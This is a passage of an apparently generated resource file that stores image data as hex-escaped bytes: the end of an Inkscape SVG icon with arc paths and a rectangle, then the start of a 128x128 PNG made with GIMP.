\x30\x39\x34\x36\x31\x30\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\x3d\x22\x34\x2e\x39\
\x32\x34\x30\x31\x34\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\x22\x34\x2e\x30\x37\
\x31\x38\x34\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x72\x79\x3d\x22\x33\x2e\x31\x31\x34\
\x36\x30\x38\x38\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\
\x69\x70\x6f\x64\x69\x3a\x73\x74\x61\x72\x74\x3d\x22\x34\x2e\x37\
\x30\x39\x35\x34\x33\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x65\x6e\x64\x3d\x22\x31\x2e\x35\x34\
\x32\x34\x30\x30\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x64\x3d\
\x22\x4d\x20\x38\x2e\x30\x38\x33\x30\x32\x31\x38\x2c\x31\x2e\x38\
\x30\x39\x34\x31\x37\x39\x20\x41\x20\x34\x2e\x30\x37\x31\x38\x34\
\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x20\x30\x20\x30\
\x20\x31\x20\x31\x32\x2e\x31\x36\x35\x39\x35\x36\x2c\x34\x2e\x38\
\x37\x35\x33\x36\x32\x34\x20\x34\x2e\x30\x37\x31\x38\x34\x32\x32\
\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x20\x30\x20\x30\x20\x31\
\x20\x38\x2e\x32\x31\x30\x32\x31\x39\x36\x2c\x38\x2e\x30\x33\x37\
\x33\x36\x37\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\
\x69\x70\x6f\x64\x69\x3a\x6f\x70\x65\x6e\x3d\x22\x74\x72\x75\x65\
\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x67\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\
\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\
\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x32\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x32\x22\x3e\
\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x66\
\x66\x66\x66\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\
\x35\x30\x34\x32\x37\x37\x31\x31\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x38\x35\x33\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x74\
\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x78\x3d\x22\x38\x2e\
\x30\x37\x34\x32\x39\x31\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\x3d\x22\x38\x2e\x38\
\x34\x33\x35\x38\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\x22\x31\x2e\x38\x31\
\x35\x38\x36\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x72\x79\x3d\x22\x31\x2e\x37\x31\x35\
\x38\x39\x33\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\
\x69\x70\x6f\x64\x69\x3a\x73\x74\x61\x72\x74\x3d\x22\x33\x2e\x31\
\x34\x31\x35\x39\x32\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x65\x6e\x64\x3d\x22\x32\x2e\x38\
\x32\x30\x34\x36\x30\x33\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x64\
\x3d\x22\x4d\x20\x36\x2e\x32\x35\x38\x34\x32\x33\x33\x2c\x38\x2e\
\x38\x34\x33\x35\x38\x32\x31\x20\x41\x20\x31\x2e\x38\x31\x35\x38\
\x36\x37\x39\x2c\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\
\x30\x20\x31\x20\x37\x2e\x39\x32\x38\x36\x36\x34\x34\x2c\x37\x2e\
\x31\x33\x33\x32\x31\x35\x31\x20\x31\x2e\x38\x31\x35\x38\x36\x37\
\x39\x2c\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\
\x31\x20\x39\x2e\x38\x36\x36\x38\x30\x31\x35\x2c\x38\x2e\x35\x36\
\x39\x32\x35\x20\x31\x2e\x38\x31\x35\x38\x36\x37\x39\x2c\x31\x2e\
\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\x31\x20\x38\x2e\
\x35\x30\x37\x34\x32\x35\x36\x2c\x31\x30\x2e\x35\x30\x39\x39\x34\
\x38\x20\x31\x2e\x38\x31\x35\x38\x36\x37\x39\x2c\x31\x2e\x37\x31\
\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\x31\x20\x36\x2e\x33\x35\
\x31\x32\x35\x33\x2c\x39\x2e\x33\x38\x35\x31\x38\x39\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6f\
\x70\x65\x6e\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x3c\x72\x65\x63\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x66\x66\x66\x66\
\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\
\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x37\x39\x33\
\x36\x35\x33\x37\x33\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x72\x65\x63\x74\x31\x36\x38\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x2e\x32\x34\x38\
\x38\x33\x35\x34\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x68\x65\x69\
\x67\x68\x74\x3d\x22\x34\x2e\x30\x38\x34\x32\x31\x34\x32\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x37\x2e\x34\x39\x31\x34\
\x36\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x31\
\x30\x2e\x33\x34\x34\x30\x30\x36\x22\x20\x2f\x3e\x0a\x20\x20\x3c\
\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x24\xd4\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x80\x00\x00\x00\x80\x08\x06\x00\x00\x00\xc3\x3e\x61\xcb\
\x00\x00\x00\x06\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\
\xa7\x93\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\
\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x00\x07\x74\x49\x4d\x45\x07\
\xe0\x04\x05\x0a\x22\x13\x36\x55\x65\xf8\x00\x00\x00\x1d\x69\x54\
\x58\x74\x43\x6f\x6d\x6d\x65\x6e\x74\x00\x00\x00\x00\x00\x43\x72\
\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\x64\
\x2e\x65\x07\x00\x00\x20\x00\x49\x44\x41\x54\x78\xda\xed\x9d\x79\
\x94\x5c\xc5\x7d\xef\x3f\x55\x77\xe9\x6d\x96\x9e\x99\xee\x91\x34\
\xa3\x11\x92\x10\x8b\x10\x02\x24\x94\x3c\x16\xf3\x1c\x83\x1d\x27\
\x2c\x7e\x06\x04\x38\xde\x38\x39\x71\xec\xbc\x24\x36\x58\x8a\x97\
\x3c\x36\x1f\x88\x8d\x0d\x02\x2f\x38\x38\xd8\xc0\xb3\x09\x06\x64\
\x24\x7c\x9e\xfd\x6c\x2c\x63\x3b\x0e\x3e\x10\xc3\x13\x20\xb4\x30\
\x32\xdb\x68\x03\xcd\x8c\x46\xb3\x6f\xbd\xdc\x5b\xef\x8f\xbb\xf4\
\xed\xee\xdb\x33\x3d\x5a\x2c\x09\x75\x9d\x73\x4f\xdf\xee\xea\x5f\
\xdd\x99\xfe\x7d\xeb\xb7\xd5\xef\x57\x25\x00\x45\xad\x1d\xb7\x4d\
\xd6\x7e\x82\x1a\x00\x6a\xad\x06\x80\x5a\xab\x01\xa0\xd6\x8e\xcb\
\xa6\x1f\x31\xe4\x49\x93\x68\x6c\x0e\x00\x93\x13\x7b\xb1\xed\x6c\
\x8d\x1b\xc7\x13\x00\xa2\xb1\x39\x9c\x72\xf6\x2d\x08\x2d\xc2\x8e\
\x57\xee\x61\x70\xdf\x4b\xd8\x76\xa6\xc6\x91\xe3\x45\x05\x48\x2d\
\x42\xac\x7e\x3e\x2d\xe9\xff\xc6\x89\x4b\xff\x89\x64\x7a\x19\x52\
\x46\x6a\x1c\x39\x9e\x6c\x00\xa1\x04\x42\x8b\xd2\x98\x5a\x56\x03\
\xc1\xd1\x02\x00\x21\x44\x55\xd7\x81\xd2\x85\xd1\x6a\xb2\x1c\x04\
\xd3\xd1\xd4\xda\x21\x06\xc0\x4c\x7f\xe8\x83\x61\x50\x35\x20\x10\
\xc2\xac\xf8\xbc\x5a\x3b\x84\x00\x38\x9a\x7e\xd4\xe9\x40\x70\xa0\
\x60\xad\xb5\x43\xac\x02\xaa\x91\x08\x33\xa3\x2d\x5c\xba\x16\x25\
\x99\x5e\xc6\xa2\x33\xfe\x89\xa6\xd6\xe5\xbe\x3a\xa8\x56\x92\xd4\
\xda\x21\x52\x01\x53\x31\x6f\xa6\x7d\x95\xfb\x1d\xa6\xfb\x7d\xee\
\xa5\xcb\x28\xc9\xd4\x32\x16\x9d\xb1\x9a\xa6\xd6\xe5\x08\x61\x4e\
\x69\x7b\xd4\xda\x41\x02\xc0\xfb\x11\x85\x10\x48\x29\x91\x52\x16\
\xdd\x97\xbe\x0f\x63\x70\x69\x5f\x75\xb4\x2e\xd3\x3d\x20\xb8\x97\
\x90\xa0\xeb\x8e\x3a\x58\xb4\x74\x35\xcd\xb3\xce\xf6\xbd\x83\x30\
\x20\xd4\x40\x70\x30\x6a\x57\xca\x2f\x01\x18\x86\x41\x2a\x95\x22\
\x95\x4a\x31\x39\x39\x89\x52\xaa\x8c\x61\xa5\x0c\xf0\xee\x75\x5d\
\x27\x9d\x4e\xd3\xd2\xd2\x42\x26\x93\xc1\xb6\xed\x69\x69\xcd\x48\
\x0b\xb3\xe7\x5d\x4a\x24\xde\x4c\xb2\x41\xa3\xa1\x5e\x92\xcb\x29\
\x94\x02\xe9\x02\x42\x0a\x9d\x48\x3c\x45\xbc\x7e\x01\x13\x63\x3b\
\xc8\x4e\xf4\x01\x56\x28\xd3\x6b\x20\x38\x08\x09\x20\xa5\x24\x95\
\x4a\xb1\x7e\xfd\x7a\xb6\x6f\xdf\xce\xd9\x67\x9f\x4d\x24\x12\x29\
\x9a\xc5\x52\x4a\x34\x4d\x2b\xfb\x4c\x4a\x49\x3a\x9d\x66\xdd\xba\
\x75\x6c\xdf\xbe\x9d\xe5\xcb\x97\x57\x4d\x2b\x24\x24\xeb\x25\x37\
\x5d\xdf\xc4\xfd\x6b\x5a\x59\xb4\xc0\xc0\x30\x02\x36\x81\x2b\x09\
\x9a\xd2\x67\xb1\xe8\x8c\x55\x34\xb5\x2e\x2b\xb2\x09\x6a\x4c\x3f\
\x04\x00\x90\x52\x62\x18\x06\x27\x9e\x78\x22\xe7\x9e\x7b\x2e\x86\
\x61\xb0\x7e\xfd\x7a\xda\xda\xda\x2a\x32\x30\x28\xd2\x4d\xd3\x64\
\xd1\xa2\x45\x3e\xed\x13\x4f\x3c\xe1\xd3\x7a\x34\xe1\xb4\x02\x43\
\x97\xcc\x99\xad\xb3\xf8\xa4\x08\xba\x26\xb8\xf9\xfa\x66\x9a\x9b\
\x34\x84\x14\x08\x29\x90\x52\x20\x85\xc0\xd0\x63\xae\x61\xb8\xba\
\x0c\x04\x35\x29\x70\x08\x24\x40\x6b\x6b\x2b\xdf\xff\xfe\xf7\xfd\
\x0f\x53\xa9\x14\xe9\x74\x1a\xc3\x30\xd0\x75\x1d\x4d\xd3\xca\x2e\
\x8f\xa1\xad\xad\xad\x3c\xf8\xe0\x83\x3e\x6d\x4b\x4b\x0b\xe9\x74\
\x1a\xd3\x34\x43\xe9\x82\xb4\x4d\x49\x83\x7f\xfa\x54\x93\x4f\xdb\
\x50\xaf\x91\xac\x97\x18\x1a\x68\xd2\xb9\xa4\x74\xa4\x81\xa1\x45\
\x69\x4c\x9d\x55\x06\x82\x1a\xd3\x0f\x41\x1c\xa0\xa1\xa1\x81\x05\
\x0b\x16\x14\x75\x7c\xec\x63\x1f\x23\x99\x4c\xa2\xeb\x7a\x11\x08\
\x4a\x25\x42\x32\x99\x3c\x60\xda\xba\x84\xce\xec\xd6\xe2\xf5\xa8\
\x8b\x2e\x88\x13\x8f\x0b\x34\xcd\x61\x7e\xf0\x32\xf4\x72\x10\x94\
\xce\xfc\x1a\x20\x66\x08\x00\xd3\x34\x69\x6d\x6d\x2d\xeb\xf8\xe4\
\x27\x3f\xc9\xec\xd9\xb3\xd1\x34\x2d\x54\x0a\x78\xe2\xbf\x12\xed\
\xac\x59\xb3\xa6\xa1\x35\x68\x6a\x34\xca\x68\x2f\xbe\x30\x41\x73\
\x52\x43\x4a\x81\xe6\x5e\x9e\x14\x90\x01\x49\x70\xe2\xd2\x55\xb5\
\xb5\x83\x43\x01\x80\x74\x3a\xcd\x77\xbe\xf3\x1d\x00\x7e\xfd\xeb\
\x5f\x73\xdd\x75\xd7\xf9\x9d\x91\x48\x64\x4a\x31\xde\xda\xda\xca\
\x3d\xf7\xdc\x03\xc0\x6f\x7e\xf3\x1b\xae\xbf\xfe\xfa\xaa\x69\xd3\
\xe9\x66\x56\xfd\xfd\xc9\x00\x6c\xda\x96\xe1\xdf\x1e\x1a\xf4\x69\
\x0d\x43\xf8\xe2\x5f\x4a\x90\xa2\x00\x02\x21\x40\x97\x11\x92\x2e\
\x08\xbc\x38\x41\xad\x1d\x20\x00\x1a\x1b\x1b\x39\xe9\xa4\x93\x00\
\xf8\xf2\x97\xbf\xcc\x93\x4f\x3e\xc9\x9d\x77\xde\x09\xc0\xec\xd9\
\xb3\x89\xc5\x62\x15\x19\x99\x4c\x26\x59\xb4\x68\x11\x00\xb7\xdf\
\x7e\x3b\x1b\x36\x6c\x60\xcd\x9a\x35\xd5\xd1\x36\x34\xd2\x3e\x27\
\x06\xc0\x63\x3f\x19\x61\xe3\xe6\x0c\xeb\xfe\xef\x08\x00\xcd\x8d\
\x12\xd3\x2c\x51\x01\x45\x20\x10\x68\x9e\x24\x38\xbd\x5c\x12\xd4\
\xd4\xc0\x0c\x00\xa0\x69\x1a\x00\x0f\x3e\xf8\x20\x3b\x77\xee\x64\
\x64\x64\x84\x0d\x1b\x36\x00\xf0\xc0\x03\x0f\x30\x67\xce\x9c\x8a\
\x96\xbc\xae\x3b\xfa\xfb\x07\x3f\xf8\x01\xbb\x77\xef\x0e\xa5\x2d\
\x9d\xf9\xbe\x17\xa0\x3b\x41\xc8\x5f\xfe\xe7\x18\x7d\xfb\x2d\x26\
\x26\x15\x2f\x6c\x71\x12\x42\x3e\xfb\xc9\x24\xcd\x49\xcd\x11\xfb\
\x9e\x21\x28\x8b\x03\x46\x02\x47\x1d\x34\xb8\x36\xc1\x54\x6b\x07\
\xb5\x36\x05\x00\x16\x2e\x5c\x08\xc0\xc3\x0f\x3f\xcc\xd8\xd8\x18\
\x00\x43\x43\x43\xbc\xf5\xd6\x5b\x24\x12\x09\xa2\xd1\x68\xa8\x4f\
\x1f\x8b\xc5\x68\x6f\x6f\x07\xe0\xd1\x47\x1f\x65\x6c\x6c\x0c\x21\
\x44\x11\x6d\x2c\x16\xf3\x19\xee\xcc\x5a\xcd\xa7\x6d\x6b\x9b\x0d\
\xc0\x7f\xfe\xd7\x04\x13\x93\x0a\x21\x60\x6c\x5c\xd1\xd7\x6f\x11\
\x8d\x48\x4c\xc3\x71\x03\x8b\xc3\xc4\xc2\xb7\x05\xbc\x59\xae\xfb\
\xf9\x04\x35\x10\x1c\x10\x00\x1e\x7f\xfc\x71\x00\x46\x47\x47\x51\
\x4a\x21\x84\xa0\xaf\xaf\x8f\x55\xab\x56\xe1\x45\x08\xc3\xc2\xbd\
\x6d\x6d\x6d\x3c\xfa\xe8\xa3\x00\x3e\x70\xa4\x94\x0c\x0c\x0c\xb0\
\x7a\xf5\x6a\x9f\x36\x38\xeb\xbd\x71\xda\xda\xda\xf8\xfe\x83\x77\
\x03\x30\x3e\x69\xfb\x62\x7d\x64\xd4\xe6\xbb\x3f\x1c\x72\x18\xab\
\x0b\x04\x38\xb1\x80\x80\x3b\x58\xb4\x7e\x20\xbc\x70\xa6\x1b\x36\
\x3e\xa3\xb0\x8a\x58\x53\x03\x33\x88\x03\x3c\xfc\xf0\xc3\xf4\xf5\
\xf5\xf9\x1f\xe6\xf3\x79\xf6\xef\xdf\x0f\xc0\x8a\x15\x2b\x88\xc5\
\x62\x45\xfa\x55\x08\x41\x34\x1a\x45\x08\xc1\xda\xb5\x6b\x19\x18\
\x18\xf0\x3f\xcf\xe7\xf3\x0c\x0c\x0c\x14\xd1\x96\xae\x19\x78\xb4\
\xbf\x7e\xba\x87\xb1\x31\xdb\x1d\x17\x6c\x1b\x46\xdd\xf7\x27\x2d\
\x34\x30\x4b\x0d\x7c\x51\x7e\xef\x7d\xa4\x57\xb9\x94\x5c\x6b\x21\
\x00\x78\xe0\x81\x07\x18\x19\x19\x41\xa9\x42\x95\x58\x36\xeb\x64\
\xe9\xde\x76\xdb\x6d\xcc\x9a\x35\xab\x34\x7c\x48\x34\x1a\x05\xe0\
\xa1\x87\x1e\x62\x74\x74\xb4\x28\x3c\x9b\xcb\xe5\x00\xb8\xf5\xd6\
\x5b\x99\x35\x6b\x56\xd9\x5a\x80\x47\xfb\xe4\xaf\x7b\x98\x98\x2c\
\x36\xda\xf2\x4e\xa8\x9f\x6b\x57\x36\xd0\xd4\xa0\x85\x44\xfb\x82\
\x2a\xa1\x58\x22\x84\x65\x16\xd5\x5a\x15\x00\x18\x1f\x1f\xc7\xb2\
\x2c\x94\x52\xd8\xb6\x8d\x6d\xdb\xf4\xf4\xf4\x70\xe3\x8d\x37\x3a\
\x3f\xac\xa6\x15\x49\x80\x86\x86\x06\xae\xbd\xf6\x5a\x00\x26\x27\
\x27\xb1\x6d\xbb\x28\x2a\xd7\xdb\xdb\xcb\xcd\x37\xdf\xec\x8a\x72\
\xbd\x08\x58\x41\xda\x6c\xd6\x46\x29\xfc\x55\x41\x80\x81\x21\x8b\
\x87\xd6\x0d\xbb\x0c\x0d\xff\xa3\x0b\xaa\x40\x94\x49\x04\xbd\x96\
\x63\x38\x73\x00\x64\x32\x19\x94\x52\x45\xd7\xd8\xd8\x18\xcf\x3f\
\xff\x3c\x00\x4d\x4d\x4d\xbe\xc5\xef\x85\x7b\xaf\xb9\xe6\x1a\x00\
\x72\xb9\x1c\x52\x16\x38\xa5\x94\x62\x7c\x7c\x9c\x8d\x1b\x37\xfa\
\xb4\x86\x61\x84\xd2\x5a\x96\x42\x94\x30\x39\x9b\x85\x57\xdf\x70\
\x24\x48\x5d\x9d\x44\x4e\x97\xb6\x1a\x00\x8f\xf7\x5a\x93\x04\x33\
\x00\xc0\xd2\xa5\x4b\xd9\xbd\x7b\x77\xd1\xec\xf7\x2e\x4f\x0d\xdc\
\x7d\xf7\xdd\x34\x37\x37\xfb\x12\xa0\xae\xae\x0e\x80\x8f\x7f\xfc\
\xe3\xf4\xf4\xf4\x94\x0d\xaa\x94\xf2\xd5\xc0\x5d\x77\xdd\xe5\xd3\
\x4a\x29\x7d\xda\xbf\xfd\xd4\xe7\xd9\x3f\x10\x52\x07\xa0\x20\x6f\
\x39\x12\xe3\x53\x1f\x6d\xa4\xa1\x2e\xdc\x13\xf0\xf3\x07\x4a\xd4\
\x00\x35\x10\xcc\x0c\x00\x6f\xbc\xf1\x86\xbf\x86\xef\xcd\x7e\x0f\
\x00\xe3\xe3\xe3\x8c\x8d\x8d\x31\x77\xee\x5c\x1a\x1b\x1b\x01\xa8\
\xaf\xaf\xe7\x43\x1f\xfa\x10\x00\xdd\xdd\xdd\x64\xb3\xd9\xd0\x45\
\x99\x89\x89\x09\xc6\xc7\xc7\x69\x6f\x6f\x27\x99\x4c\xfa\xc0\xf1\
\x68\x7b\x7a\xfa\xc8\xe7\x0b\xba\x3c\xc0\x7f\xb2\x39\xc5\x64\xc6\
\x26\xd5\xac\x91\x88\xcb\xa9\x26\x3f\x32\x44\x0d\xd4\x6c\x82\x19\
\x00\x20\x28\xf6\x6d\xdb\xc6\xb2\x2c\x1f\x00\x7b\xf7\xee\xe5\xaf\
\xff\xfa\xaf\x01\x78\xff\xfb\xdf\x4f\x7d\x7d\x3d\x1d\x1d\x1d\x7c\
\xf4\xa3\x1f\x75\x45\xb8\x15\x3a\xfb\x95\x52\xf4\xf4\xf4\xf0\x89\
\x4f\x7c\x02\x80\xf7\xbd\xef\x7d\x34\x34\x34\x30\x6f\xde\x3c\x9f\
\x56\xd9\x76\xd9\xac\xf5\x2c\x85\xfe\x41\x9b\xaf\x7f\xd7\x09\x0d\
\xaf\x38\x23\x42\xc4\x14\x21\xfa\xbf\xd8\x1d\x14\x21\x8e\x42\x0d\
\x04\xd3\x37\xdd\x63\x7c\x58\xcb\x64\x32\xbe\x88\x5f\xbd\x7a\x35\
\x6f\xbf\xfd\x36\x1f\xf8\xc0\x07\x00\xe8\xea\xea\x62\x7c\x7c\x1c\
\x29\xa5\xcf\xf4\x62\x5d\x9e\xa5\xb7\xb7\x17\x80\x55\xab\x56\xb1\
\x77\xef\x5e\x2e\xbd\xf4\x52\x9f\x76\x6c\x7c\x9c\x98\x28\xe7\x98\
\x52\x90\xcf\x2b\x06\x87\x9d\xbf\xe9\xca\x4b\xea\xd9\xf9\x56\x8e\
\x3f\xbc\x91\x63\x78\x44\x39\x20\x51\x25\x51\x41\x55\x00\x41\xb0\
\xdf\xfb\x93\x82\x20\x78\x63\xcb\x9a\x5a\x19\x5a\x50\x8a\x1a\x86\
\xa1\x82\x01\x1e\x4d\xd3\xfc\x57\x29\x25\x27\x9e\x78\x22\xcf\x3d\
\xf7\x5c\x19\xe1\x35\xd7\x5c\xc3\xa6\x4d\x9b\xc8\xe7\xf3\x00\x3e\
\x88\x82\x80\x9a\x3f\x7f\x3e\x4f\x3f\xfd\x74\x28\xed\xab\xaf\x0f\
\x70\xd2\x59\xb7\x12\xab\x9f\x0f\x4a\xa0\x5c\xe6\x7b\x40\x6a\x4d\
\x69\xdc\x7d\x4b\xda\xa7\xd9\xf8\xf2\x24\xf7\xfd\xfb\x10\xc3\x63\
\x0a\x65\x83\xad\x14\xb6\xed\xd0\xd8\x25\xef\x51\xf8\xe3\x05\x9b\
\x65\x4f\x32\xd4\xf7\x52\x0d\x04\xa5\x5e\x80\xc7\x34\xa5\x94\xef\
\x0e\x7a\xaa\xa0\xb7\xb7\x97\xfb\xef\xbf\xbf\x8c\x70\x60\x60\xc0\
\x67\x7e\xa9\xf8\xf7\xee\xfb\xfa\xfa\x8a\x92\x45\x82\xb4\x96\x65\
\x87\xaa\x0f\x4f\x0a\x0c\x0d\xdb\x6c\xf8\xed\x98\xdf\xb7\xe2\xcc\
\x28\x75\x75\xb2\x4c\x15\x94\x06\x85\xa6\x0a\x00\xd6\xd4\x41\x15\
\x36\x40\xe9\xeb\xc8\xc8\x08\x8f\x3c\xf2\x48\x11\xd1\xee\xdd\xbb\
\x19\x1d\x1d\x0d\x1d\x30\x38\xde\xc8\xc8\x08\x3f\xfa\xd1\x8f\xaa\
\xa6\xc5\x97\x02\x30\x99\x51\xfc\xf6\xbf\x26\xca\x8c\xbe\x20\x93\
\x83\x20\x28\x62\x7e\x95\x20\x68\x9e\x75\x2e\xf1\xba\xf9\x48\x69\
\xd6\x00\x50\xea\x01\x78\x97\x65\x59\xf4\xf5\xf5\xd1\xdf\xdf\xef\
\x13\x7d\xf6\xb3\x9f\xf5\x43\xc5\xc5\x33\x57\x95\x49\x93\xfd\xfb\
\xf7\x17\xd1\xae\x5a\xb5\x8a\xfe\xfe\xfe\xa2\xd9\xae\x00\xdb\x2e\
\xbc\x77\x0c\x4c\x18\x1e\xb1\x19\x19\x75\x24\xc5\xeb\x3b\xb2\x8c\
\x8d\xab\xd0\x1d\xad\x04\x54\xc8\x11\x9c\x1a\x04\xa7\xfe\xc9\xbf\
\xb0\x78\xc5\x97\x49\xa6\x97\x1f\xb7\xd2\xa0\x0c\x00\x61\x80\xe8\
\xe9\xe9\xe1\x23\x1f\xf9\x08\xb9\x5c\x8e\x8d\x1b\x37\xd2\xd5\xd5\
\x45\x36\x9b\xf5\x41\x52\x0a\x9c\x20\x08\x7a\x7b\x7b\xb9\xf6\xda\
\x6b\xc9\xe5\x72\xbc\xf0\xc2\x0b\x74\x75\x75\xb9\x81\x27\x47\x77\
\xa3\x0a\x4c\x0f\xea\x74\x05\x0c\x0c\xdb\x7c\xed\xde\x01\xf2\x79\
\xc5\xfd\x8f\x0c\x33\x3c\x66\x1f\xb2\x7f\x5c\x93\x51\xe2\x89\xf9\
\x34\xcd\x3e\xe7\xb8\x56\x09\x42\x4a\xa9\xbc\x00\x4f\x58\xa1\x47\
\x70\x09\x77\xce\x9c\x39\xe4\x72\x39\x86\x87\x87\xfd\x95\xc3\xa0\
\x0d\x51\xca\x7c\xaf\x45\xa3\x51\x5a\x5b\x5b\xc9\xe7\xf3\x0c\x0e\
\x0e\xa2\x94\x22\x5e\xb7\x80\xc5\x7f\xf2\x15\x62\x75\x0b\x8a\x99\
\xaf\x8a\x41\xa1\xeb\xd0\x50\x27\x19\x19\xb3\xf1\x4c\x0e\x47\x6a\
\xa8\x82\x01\xe8\x03\x47\x61\xab\x82\x1a\x21\xc4\x10\x0c\x6b\xc7\
\xb3\x71\xa8\x01\x5f\x9a\xaa\xdc\xdb\xbb\xf7\xec\x81\x89\x89\x89\
\x32\x91\x1f\x26\x01\x82\x97\x65\x59\x0c\x0f\x0f\x33\x3e\x3e\xee\
\x7f\x66\x98\x49\x52\x73\xde\x8b\x11\x49\xa2\x94\xf0\x99\xaf\xec\
\x02\x73\x15\x60\xd9\x30\x91\x51\x38\x36\xa3\x0b\x38\xaf\xdf\x93\
\x1c\x8a\x22\x75\x32\x63\x31\x28\x74\xcc\x58\x9a\x78\xfd\x42\x26\
\x46\xbb\xc8\x4c\xec\x43\x29\xeb\xf8\x00\x80\x10\xe2\x4b\x54\xd4\
\xa1\xe5\x95\x3d\x61\xc6\x5e\x98\xf8\x0f\x02\xa1\xd4\x4e\x00\xd0\
\xf4\x24\xe9\xb6\xf7\xa1\x19\x4d\x01\x00\x14\x33\x36\x68\x18\x7a\
\x81\x22\x55\x62\x2c\xfa\x36\x84\x37\xfe\x81\xea\xc2\xe3\x14\x04\
\x3e\x00\x82\x0c\xae\x54\x7f\x37\x1d\x00\x82\xe2\x3f\x18\x0f\x08\
\x03\x82\x6e\x24\x49\xb5\xff\x39\xba\xe9\x00\xa0\x94\xf9\xa5\x40\
\x08\xbb\x2f\x52\x19\x41\x9a\x19\x88\xff\xe3\x1d\x04\x45\x00\xf0\
\x18\x1d\xd4\xef\x95\xca\xb0\xa6\xf2\x1c\xc2\x66\x7f\xe9\xbd\x61\
\x34\x91\xf6\x00\xe0\xda\x00\x41\xa6\x7a\x7c\x2c\x65\xa8\x2a\x15\
\xf7\xae\xe4\x40\x1d\x9a\x3d\x6f\x8f\x37\x10\x84\xda\x00\x61\xef\
\x83\x46\xdd\x4c\xc4\x7f\x18\x9d\x6d\xdb\xe8\x66\x92\x74\xfb\x5f\
